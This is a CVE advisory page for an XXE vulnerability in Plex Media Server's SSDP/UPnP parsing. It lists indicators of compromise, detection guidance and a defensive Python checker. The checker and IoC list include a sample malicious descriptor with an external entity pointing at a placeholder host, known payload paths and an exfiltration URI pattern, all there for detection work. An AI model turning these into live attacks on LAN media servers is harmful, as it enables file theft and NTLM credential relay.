CVE-2018-13415
published 2018-08-13


CVSS 3.0: 9.8 critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Priority: P276, critical
Exploit: public exploit available
EPSS: 31.81% (98.1st percentile)
In Plex Media Server 1.13.2.5154, the XML parsing engine for SSDP/UPnP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Remote, unauthenticated attackers can use this vulnerability to: (1) Access arbitrary files from the filesystem with the same permission as the user account running Plex, (2) Initiate SMB connections to capture a NetNTLM challenge/response and crack to cleartext password, or (3) Initiate SMB connections to relay a NetNTLM challenge/response and achieve Remote Command Execution in Windows domains.

Affected (1 range)

Vendor: plex
Product: media_server
Version range: not listed
Fixed in: not listed

Detection & IOCs (extracted from sources)

url: https://gitlab.com/initstring/evil-ssdp
port: 1900/udp
ip: 239.255.255.250
path: /ssdp/device-desc.xml
path: /ssdp/data.dtd
port: 445/tcp
ua: DVBLink
version: Plex Media Server 1.13.2.5154
  • Monitor for outbound SMB connections (port 445) originating from the Plex Media Server process — this is anomalous and indicates XXE-triggered NTLM relay/capture activity.
  • Detect HTTP GET requests to paths matching /ssdp/device-desc.xml and /ssdp/data.dtd on attacker-controlled servers; these are the XXE payload delivery paths used in exploitation.
  • Alert on HTTP GET requests containing the pattern /?exfiltrated= in the URI, which indicates successful out-of-band XXE file exfiltration from Plex.
  • Monitor SSDP traffic (UDP 239.255.255.250:1900) for M-SEARCH responses that include a Device Descriptor URL pointing to an external or non-local host, which is the initial XXE trigger vector.
  • Inspect XML content fetched by Plex over HTTP for DOCTYPE declarations containing ENTITY tags referencing SMB (file://) or HTTP URIs — presence of these in SSDP device descriptors is the XXE payload signature.
  • Look for the [XXE VULN!!!!] log pattern or equivalent: a User-Agent of 'None' making requests to /ssdp/device-desc.xml, which is the fingerprint of Plex's libxml2 XXE callback.
  • The attack is limited to attackers on the same LAN as the Plex server, as it requires responding to SSDP UDP multicast traffic on the local network segment.
  • File exfiltration via XXE (POC 2) is limited to single-line files with no whitespace; multi-line or whitespace-containing files cannot be reliably exfiltrated with this technique.
  • The vulnerability is exploited automatically upon Plex restart — no user interaction beyond restarting the service is required, making it a zero-click attack on the LAN.
  • The XXE is processed by libxml2 within Plex's SSDP/UPnP component; the affected component and library should be the focus of patching and version tracking.
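The detection points above (a device-descriptor LOCATION that does not point back at the responding LAN host, the payload-delivery paths, and DOCTYPE/ENTITY declarations inside a fetched descriptor) can be turned into a small monitoring check. The script below is an added example written for this page, not code from Plex or from the evil-ssdp project. It works on constructed sample inputs embedded inline: the SSDP replies, the responder address 192.168.1.20, the placeholder host 203.0.113.5 and the XML snippets are all assumptions, and the LAN prefixes it treats as local are the RFC 1918 and link-local ranges.

```python
"""Defensive checks for SSDP device-descriptor handling (added example, not vendor code)."""
import ipaddress
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Paths the IoC list names as XXE payload-delivery paths.
SUSPICIOUS_PATHS = ("/ssdp/device-desc.xml", "/ssdp/data.dtd")

# Address ranges we treat as "on the LAN" (assumption: RFC 1918 plus link-local).
LAN_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("169.254.0.0/16"),
]

# Constructed SSDP M-SEARCH reply whose descriptor URL points off-LAN (203.0.113.5 is a
# documentation placeholder) and uses the device-desc.xml path from the IoC list.
SAMPLE_SSDP_REPLY = (
    "HTTP/1.1 200 OK\r\n"
    "CACHE-CONTROL: max-age=1800\r\n"
    "ST: upnp:rootdevice\r\n"
    "USN: uuid:00000000-0000-0000-0000-000000000000::upnp:rootdevice\r\n"
    "LOCATION: http://203.0.113.5:8888/ssdp/device-desc.xml\r\n"
    "\r\n"
)

# Constructed benign reply: the descriptor is served by the responding device itself.
BENIGN_SSDP_REPLY = (
    "HTTP/1.1 200 OK\r\n"
    "ST: upnp:rootdevice\r\n"
    "LOCATION: http://192.168.1.20:49152/description.xml\r\n"
    "\r\n"
)

# Constructed descriptor carrying the DOCTYPE/ENTITY signature described in the IoC list
# (an external SYSTEM entity pointing at the data.dtd path named on the page).
SAMPLE_BAD_XML = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE root [<!ENTITY ext SYSTEM "http://203.0.113.5:8888/ssdp/data.dtd">]>\n'
    "<root><device><friendlyName>&ext;</friendlyName></device></root>"
)

# Constructed clean descriptor with no DTD at all.
SAMPLE_GOOD_XML = (
    '<?xml version="1.0"?>\n'
    "<root><device><friendlyName>Example</friendlyName></device></root>"
)

# Matches <!ENTITY name SYSTEM "uri"> and <!ENTITY name PUBLIC "id" "uri"> (also % parameter entities).
ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(?:%\s+)?[\w.\-]+\s+(?:SYSTEM\s+|PUBLIC\s+["'][^"']*["']\s+)["']([^"']*)["']""",
    re.IGNORECASE,
)
DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)


def parse_ssdp_headers(reply: str) -> dict:
    """Parse the header block of an SSDP (HTTP-over-UDP) reply into a lower-cased dict."""
    headers = {}
    for line in reply.split("\r\n")[1:]:  # skip the status line
        if not line:                      # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def check_ssdp_reply(reply: str, responder_ip: str) -> list:
    """Return reasons the reply's LOCATION should not be fetched blindly (empty list = looks normal)."""
    reasons = []
    location = parse_ssdp_headers(reply).get("location")
    if not location:
        return ["no LOCATION header"]
    url = urlsplit(location)
    host = url.hostname or ""
    # A device should serve its own descriptor: LOCATION host should be the UDP source.
    if host != responder_ip:
        reasons.append(f"LOCATION host {host} differs from responder {responder_ip}")
    try:
        addr = ipaddress.ip_address(host)
        if not any(addr in net for net in LAN_NETWORKS):
            reasons.append(f"LOCATION host {host} is outside the LAN ranges")
    except ValueError:
        reasons.append(f"LOCATION host {host!r} is a hostname, not a LAN address")
    if url.path in SUSPICIOUS_PATHS:
        reasons.append(f"LOCATION path {url.path} matches a known payload-delivery path")
    return reasons


def find_external_entities(xml_text: str) -> list:
    """Return the URIs named by SYSTEM/PUBLIC entity declarations in the descriptor's DTD."""
    return [m.group(1) for m in ENTITY_RE.finditer(xml_text)]


def parse_descriptor_safely(xml_text: str) -> ET.Element:
    """Refuse any descriptor that carries a DOCTYPE (UPnP descriptors need none), then parse it."""
    if DOCTYPE_RE.search(xml_text):
        raise ValueError("descriptor contains a DOCTYPE; refusing to parse (possible XXE)")
    return ET.fromstring(xml_text)


if __name__ == "__main__":
    print("off-LAN reply:", check_ssdp_reply(SAMPLE_SSDP_REPLY, "192.168.1.20"))
    print("benign reply:", check_ssdp_reply(BENIGN_SSDP_REPLY, "192.168.1.20"))
    print("external entities:", find_external_entities(SAMPLE_BAD_XML))
```

The DOCTYPE refusal is the mitigation side: a UPnP device descriptor never legitimately needs a DTD, so rejecting the whole document before it reaches the parser removes the XXE surface regardless of which XML library is behind it. The LOCATION check is the detection side for the M-SEARCH bullet above, and it deliberately compares the descriptor host against the reply's UDP source rather than only against private ranges, since an attacker on the LAN will themselves hold a private address.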

CVSS provenance

NVD, CVSS v3.0: 9.8 CRITICAL, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD, CVSS v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P